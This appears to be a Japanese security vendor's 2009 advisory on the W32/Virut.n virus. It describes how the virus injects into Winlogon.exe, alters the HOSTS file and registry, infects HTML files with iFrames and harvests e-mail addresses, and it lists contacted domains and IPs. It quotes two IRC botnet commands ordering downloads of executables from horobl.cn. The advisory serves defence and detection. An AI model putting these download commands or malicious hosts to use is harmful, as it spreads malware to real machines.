2009年2月15日更新 ----
W32/Virut.nは以下のメディアで注目を集めたため、危険度を「低[要注意]」に引き上げました。
http://www.microsoft.com/security/portal/Entry.aspx?Name=Virus%3aWin32%2fVirut.BM
----
・W32/Virut.nは最初にWinlogon.exeプロセスにスレッドを挿入します。成功すると、プロセスによって以下のファイルがダウンロードされ、実行されます。
・上記のファイルによって新しいsvchost.exeプロセスが起動され、スレッドがプロセスに挿入されます。svchostプロセスは%WINDOWS\System32フォルダに以下のファイルを作成し、先のVRT7.tmpファイルを削除します。
(svchost.exeは通常は正規のWindowsプロセスです。)
・9.tmpファイルが実行され、さらにマルウェアがダウンロードされます。%WINDOWS%\System32\ETC\HOSTSファイルが改変され、以下のホスト文字列が付加されます。
・システムのHTMLファイルにZeiF.plなどの悪質なドメインを指すiFrameが挿入されます。これにより、HOSTSファイルの改変だけでなく、感染したHTMLページにアクセスした未感染のマシンに感染できると同時に、感染マシンが接続して再感染するのを防ぎます。これは、感染マシンによるVirutサーバの過負荷を防止するため措置と思われます。
・Winlogon.exeのファイアウォールアクセスを可能にするため、以下のレジストリ項目が改変されます。
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
・以下のレジストリ項目が追加されます。
- HKEY_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UpdateHost
・W32/Virut.nは以下のドメイン、IPアドレスに接続します。
- horobl.cn
- goasi.cn
- setdoc.cn
- irc.zief.pl
- DNS2.zief.pl
- proxim.ircgalaxy.pl
- anti-captcha.com
- lorentil.cn
- thaexp.cn
- 209.205.196.18
- 66.232.126.195
- 204.13.249.70
- 58.65.232.34
- 61.235.117.80
- 61.235.117.81
- 74.55.100.7
- 124.207.41.201
- 124.207.117.60
- 124.236.241.91
- 66.114.124.140
- 64.13.232.135
- 66.116.109.93
- 210.51.37.106
- 83.68.16.6
- 211.95.79.6
- 218.93.202.114
- 209.205.196.18
- 66.232.126.195
- 69.46.16.191
- 195.2.252.246
- 94.247.2.38
・他のマルウェアのダウンロードを行うコマンドを受信するIRCチャンネルに接続します。
- PRIVMSG [blocked] :!get http://horobl.cn/{非表示}//0032.exe
- PRIVMSG [blocked] :!get http://horobl.cn/{非表示}//0034.exe
・感染マシンから電子メールが収集され、以下のサーバに投稿されます。
・ルートキット、バックドア、ダウンローダなど、ダウンロードされたマルウェアにより、システムでさまざまな悪質な動作が行われる可能性があります。
(%WINDOWS%はWindowsフォルダ。例:C:\Windows)
